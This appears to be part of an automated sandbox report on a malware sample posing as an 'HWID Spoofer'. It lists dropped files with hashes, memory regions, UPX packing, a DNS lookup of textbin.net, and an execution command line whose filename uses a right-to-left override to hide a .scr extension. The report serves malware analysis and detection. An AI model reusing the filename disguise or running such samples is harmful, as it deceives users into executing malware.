C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\D3DCompiler_47.dll

MD5 bf9402b754dc948c3540e72ca83a919a
SHA1 d1ec9e244fc382ebe0e4a4cc1dbf8295816d073d
SHA256 123d074af14899e15578f0657322d0110226789209f61512b34de4ee0d617bbd
SHA512 8000b18499bf07d4ed2cd8d9ef74013b7f41542accf004ce4ca18f7a100c44fb177276be22559634813c57b4bbcfd3c90fb3f2d9009731bf80299e06ca0e7bc8

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\vk_swiftshader.dll

MD5 53c29d3af7489c726853526f0c6fcbce
SHA1 73bc17f400936458caefb61628044971f25d4cf6
SHA256 b27a1f8b1c26f99b6d207755d96e043adba79487cd7065149a693570755fd8ee
SHA512 a507fef0ed7b21068959c13cd06107d371216d41192bdb0f845518cbb7cd87adccd532221b882dbf6b9daf25f7877f39e4d553469aec9b53bd0c0ce1c8b72ad1

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\vk_swiftshader.dll

MD5 995f939ec65cd20480d68fb1c84d3819
SHA1 b39cb301a1fb1751e58389546bc288e4b561a041
SHA256 43b9106107b4fca67f6f2373b2af3c3a8d315916b6aec70d8bab550014027a8e
SHA512 d1a0a9169c9956fd99eca9da73da8753f69ec409e975eeaf1de78b589da3d6c1416c1922d1dcbab858baa34c45bc74a527ac00492c2e3d3fa1f16759cb10a7eb

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

MD5 7a013aa273b462c07ff8637e0198f595
SHA1 986d5caf4e2b92dd352760e8faa4ea092a89afe1
SHA256 d7235444ac8e441e22ba75898bdaf7a57feaa69d9d7788ed6d688c4f2d3b4c91
SHA512 577fe421d6f84bb13dce5318667bb2aefe23dc019be36123596150d8e8bca616d73da0d5b9e96c3075db4c8e1d2ae6f563a396d30de2623576bd31101dd2d3be

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\ffmpeg.dll

MD5 795c4081f31fd7a00ded1ce8b5edc1f2
SHA1 1c838a0e18e21ab361fea0d52d386a556c870bb4
SHA256 4ac5544771aa971dde881e03ae623aa85d625219044df6f25deeb00d0d64f9dd
SHA512 948532f171d802abb985a48e9836c07fe8a5d2aa22e438286505691a946e4941de554f43278352d6865518918d6e4f41c18e1ec24bb8e6a38ed1cd584d2f233b

C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe

MD5 65bda51bc2b69ad50749377be387e542
SHA1 ee74f7875ab6cfa2e2099473ffd121f53298a1a7
SHA256 815483ed6fad0cb72618ddec5ae91956b8fddb51a19f4ca55c9a0466150d88a3
SHA512 cb32b2c4da78d1ccc8b5d762aa6130f9ed2ca007a68aab1008adf5f40453306310a5992ba50b9d73ff82fcf12ccafd508481d3b7bed310c6cc168591a0226ffb

C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe

MD5 154227166d93bf7fbe5cd5fc0b192a81
SHA1 ebcf6b81c1091b013ef14cdf6164224b8eb0cf39
SHA256 7f7a3df424b863ea9f5a87fc6dc89f9c0fec56929ddca5cbb56ff31d1c9628e1
SHA512 f0ae4d80e4a6135a2ea7fa32e21812679fc9429ffef1748fb079decb6a357a4e27511cce6376b800e482260e26ea59367d6468491f45e2fafbe7961aa01d5865

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0c6056e0fb8aed7b32c7a592d0ee897
SHA1 9721fdbeaf2ac95856ee5544ef742d64f35e60f0
SHA256 38429492bd95fd8f8d7271bfe80e6b26e9e142a8f36c2562cbb878dc633dc1aa
SHA512 320aa47020f63e854daac281b7b8eb337a2d79804016cc0a09405edf9953559482d23e2044b09e98478c181715dafd3c5f8566da0b89790ef03068f062ebd780

C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe

MD5 811e07764394f83803ff50395ffeed5e
SHA1 d9ab3d415c3566743edfa6cdda003f76ad217adc
SHA256 f2dafd52ac68f2cb7329e66b9b3bee364bb9dcf5f8f06faef4917c0b543845c0
SHA512 742429c474e107f879140d7169c3f1a50af7d32d056564987480be2f0b41b169b6036016f0aeaaafa1568c0f3921acdb384efc34cc925a67b5f9cf70d839b983

C:\Users\Admin\AppData\Roaming\Admin_WEP.zip

MD5 1318ec8aec2c84be0de1ce0342e0ffe5
SHA1 55ad7e11a853a09ca81e9b10d457c3eb72ae2976
SHA256 22de623bc4cf0c730801d9ca137817d729560fe8f0ce7483223950da0066f912
SHA512 36eb44dd70fb31ee023cfc05470242ba97f885c0c578ed7734ec98d93e55165af1d8770b7995b10f2ca88d011aad6e478461af05687c0ccebd0f5ecc5fbfc3c4

memory/2324-925-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-926-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-928-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-930-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-934-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-938-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-936-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-932-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-940-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-942-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-944-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-946-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-948-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-950-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-954-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-952-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-956-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-958-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-962-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-964-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-960-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-966-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-968-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-970-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-976-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-980-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-978-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-974-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-982-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-984-0x00000000066A0000-0x0000000006738000-memory.dmp

memory/2324-972-0x00000000066A0000-0x0000000006738000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-14 16:26

Reported

2023-12-14 16:27

Platform

win11-20231129-en

Max time kernel

11s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp

Files

memory/860-0-0x00007FF7C6890000-0x00007FF7C69F4000-memory.dmp

memory/860-1-0x00007FF7C6890000-0x00007FF7C69F4000-memory.dmp